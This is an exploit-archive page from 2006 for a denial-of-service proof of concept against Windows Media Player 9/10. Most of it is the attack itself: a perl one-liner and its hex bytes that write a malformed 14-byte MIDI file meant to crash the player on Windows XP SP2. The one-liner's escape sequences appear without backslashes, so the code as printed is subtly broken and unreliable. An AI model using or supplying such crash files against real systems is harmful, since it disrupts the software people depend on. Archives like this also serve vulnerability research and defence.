[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Windows Media Player 9/10 (MID File) Denial Of Service Exploit
# Published : 2006-12-15
# Author : sehato
# Previous Title : Sambar FTP Server 6.4 (SIZE) Remote Denial of Service Exploit
# Next Title : MS Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC
#!/bin/sh
# Windows Media MID File Denial Of Service Vulnerability
# Tested:
# Windows Media 10.00.00.4036
# Windows XP SP2
# file "example.mid" (Hex-Code):
# 4D 54 68 64 00 00 00 06 00 00 00 00 00 00
# File size = 14 byte
perl -e 'print "x4Dx54x68x64x00x00x00x06x00x00x00x00x00x00"' > example.mid
# www.Syue.com [2006-12-15]